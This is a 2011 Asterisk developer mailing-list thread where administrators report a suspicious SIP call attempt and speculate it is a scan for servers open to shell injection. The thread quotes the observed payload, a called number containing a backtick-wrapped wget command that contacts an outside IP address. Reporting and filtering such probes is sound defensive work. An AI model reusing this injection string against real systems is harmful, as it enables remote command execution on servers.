[asterisk-dev] A new kind of SIP attack ?
Tom Browning
ttbrowning at gmail.com
Mon Sep 12 08:03:15 CDT 2011
On Mon, Sep 12, 2011 at 4:47 AM, Olle E. Johansson <oej at edvina.net> wrote:
>
> 12 sep 2011 kl. 10:39 skrev Pavel Troller:
>
>> Hi!
>> Since yesterday, I can see strange "call attempts" coming to my
>> switches over SIP to destinations like this:
>> 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
>> I tried to wget the file manually and it was successful, but it was
>> empty (zero size).
>> I'm just informing about something which may be a new kind of hacking
>> attempt. I hope that Asterisk doesn't perform backtick expansion during
>> processing of the called number, but I'm writing it there to be sure
>> that a developer's eye will look at this and confirm it.
>> With regards,
>> Pavel Troller
>>
>
> Just wanted to add that the best current practise we added to the README files earlier apply here as well. If your diaplan ONLY has numeric extensions, filter out all the rest on incoming calls.
>
> /O
I saw (and reported on asterisk-users) the same URI attempts last
night on a server configured to be a "honeypot" of sorts (Asterisk 10
that accepts all calls via UDP 5060 and dumps them into a single
Asterisk 10 conference bridge :-) ... works great)
FWIW, the call attempts must be coming from a real SIP server as I
found two of the calls sitting in my conference bridge!
I would bet that this shell injection scan has its roots in a
discovery that a common SIP server configuration or framework is
subject to shell injection and this how they are going to find those
servers for further attack via shell injection.
Tom
More information about the asterisk-dev
mailing list